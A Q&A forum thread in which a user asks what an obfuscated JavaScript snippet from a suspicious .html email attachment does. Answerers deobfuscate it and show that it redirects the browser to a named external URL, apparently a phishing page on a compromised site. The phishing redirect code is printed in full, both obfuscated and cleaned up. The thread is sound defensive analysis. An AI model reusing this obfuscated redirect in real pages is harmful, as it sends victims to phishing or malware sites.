What does this suspicious phishing code do?

Question

A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

What did it do? It's beyond the scope of my programming knowledge.

Answer 1

It will redirect to an url, 'http://lendermedia.com/images/z.htm' (follow it on your own risk).

Copy and paste the code to a worthy JavaScript editor and have it format the source for you.

Key points:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h will equal 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t will contain a reference to document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

The property named href of b, which at this point (inside another function) really is t from the above statement, is set to h, which is the url.

Most of the code is mere noise, the actual functionality consists of this:

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();

Answer 2

Minus the obfuscation, it does something like document.location.href="http://lendermedia.com/images/z.htm"

Answer 3

Key part to understand that code is the replace(/[\^H\!9X]/g, '') parts. if the 2nd argument for the replace is '', then it's merely removing stuff from the previous string.

Really inelegant way to obfuscate things. Probably the aim is just to be random for each user and avoid Bayesian spam filters.

Answer 4

I encountered the same issue, and then found this page. After doing a WHOIS for the contact info, I contacted the owner of lendermedia.com, who appeared to have just found out that his site is hosting the z.htm page w/out his knowledge and against his wishes. At the time I contacted him I was able to browse his /images/ directory. He has since changed the permissions. All this to say that it appears this guy is clean, but that's for you to decide.